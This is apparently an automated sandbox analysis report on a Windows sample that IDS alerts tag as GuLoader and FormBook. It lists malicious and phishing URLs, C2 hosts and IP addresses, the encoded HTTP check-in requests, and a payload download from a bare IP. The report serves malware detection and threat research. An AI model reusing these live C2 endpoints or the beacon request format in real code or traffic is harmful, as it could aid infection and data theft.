Source: http://www.ddbetting.com/ro12/	Avira URL Cloud: Label: malware
Source: http://www.riderarea.com/ro12/www.shuraop.xyz	Avira URL Cloud: Label: malware
Source: http://www.shuraop.xyz/ro12/www.ktrandnews.com	Avira URL Cloud: Label: phishing
Source: http://www.digitalserviceact.online/ro12/	Avira URL Cloud: Label: malware
Source: http://www.doubleapus.com/ro12/www.holzleisten24.shop	Avira URL Cloud: Label: malware
Source: http://www.tiktok-shop-he.com	Avira URL Cloud: Label: malware
Source: http://www.xlrj.asia/ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: malware
Source: http://www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP	Avira URL Cloud: Label: malware

Source: MaMsKRmgXZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: MaMsKRmgXZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cscript.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: wntdll.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9889030155.000000003400B000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033E5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MaMsKRmgXZ.exe, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9889030155.000000003400B000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033E5E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe
Source:	Binary string: mshtml.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: cscript.pdb source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 0_2_004062DD FindFirstFileA,FindClose,	0_2_004062DD
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 0_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004057A2
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765

Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop edi		5_2_021A6CBB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop edi		5_2_021A7D83

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.20.84.62 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 130.185.109.77 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.177.169.252 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 18.119.154.66 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.120.249.181 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.123 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.12.93.8 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.digitalserviceact.online
Source: C:\Windows\explorer.exe	Network Connect: 185.104.28.238 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.247.235.89 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.18.233.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.247.82.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.197.227.142 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50012 -> 103.72.68.128:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50015 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50016 -> 104.18.233.42:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50017 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:53908 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50018 -> 34.120.249.181:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50019 -> 130.185.109.77:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50020 -> 154.12.93.8:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50021 -> 154.197.227.142:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50022 -> 185.104.28.238:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50023 -> 15.197.142.173:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50024 -> 208.91.197.39:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50025 -> 18.119.154.66:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50026 -> 34.120.249.181:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50027 -> 104.247.82.94:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50028 -> 52.20.84.62:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50030 -> 38.242.133.61:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.pwpholdings.com/ro12/

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: XIRRADE XIRRADE
Source: Joe Sandbox View	ASN Name: FARIYA-PKFariyaNetworksPvtLtdPK FARIYA-PKFariyaNetworksPvtLtdPK

Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.start399.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.niaeoer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.qualityquickprints.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.55dy5s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.holzleisten24.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.xlrj.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.fathomtackle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.digitalserviceact.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.ddbetting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.ps212naming.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKP HTTP/1.1Host: www.pwpholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo HTTP/1.1Host: www.55dy5s.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?pR-=TUQv1xq+sor4G/cf0NME9zAsbR56SjOR/AikpQZ6liEkkl3DXF9T0sERNIDZexcZDDH8&3fY=-ZkX HTTP/1.1Host: www.senior-living-91799.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/ HTTP/1.1Host: www.riderarea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ro12/?3fY=-ZkX&pR-=gjAFVEeeiH9OAOPDCKjXPtqfGvq//Fy/v54m7kKmQemvHE2y+/COmLQxuu8r1C37UwGV HTTP/1.1Host: www.ktrandnews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 52.20.84.62 52.20.84.62

Source: global traffic

HTTP traffic detected: GET /pcd/wAYOlXAIjrMljL79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: 103.72.68.128Cache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Wed, 11 Oct 2023 20:59:14 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Oct 2023 04:59:15 GMTContent-Type: text/htmlContent-Length: 466Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 11 Oct 2023 21:00:16 GMTserver: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30content-length: 203content-type: text/html; charset=iso-8859-1connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6f 31 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ro12/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Wed, 11 Oct 2023 21:00:36 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 11 Oct 2023 21:00:57 GMTServer: ApacheContent-Length: 302Content-Type: text/html; charset=UTF-8Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 32 37 29 3c 2f 68 33 3e 0d 0a 20 20 20 20 3c 21 2d 2d 2d 20 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 2d 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (27)</h3> <!--- 102.129.145.32---></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 11 Oct 2023 21:00:57 GMTServer: ApacheContent-Length: 302Content-Type: text/html; charset=UTF-8Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 32 37 29 3c 2f 68 33 3e 0d 0a 20 20 20 20 3c 21 2d 2d 2d 20 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 2d 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (27)</h3> <!--- 102.129.145.32---></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 11 Oct 2023 21:02:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 11 Oct 2023 21:02:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128
Source: unknown	TCP traffic detected without corresponding DNS query: 103.72.68.128

Source: MaMsKRmgXZ.exe, 00000002.00000003.9947544305.0000000004150000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886681382.000000000414F000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9957522419.0000000004151000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886496116.000000000414F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.72.68.128/
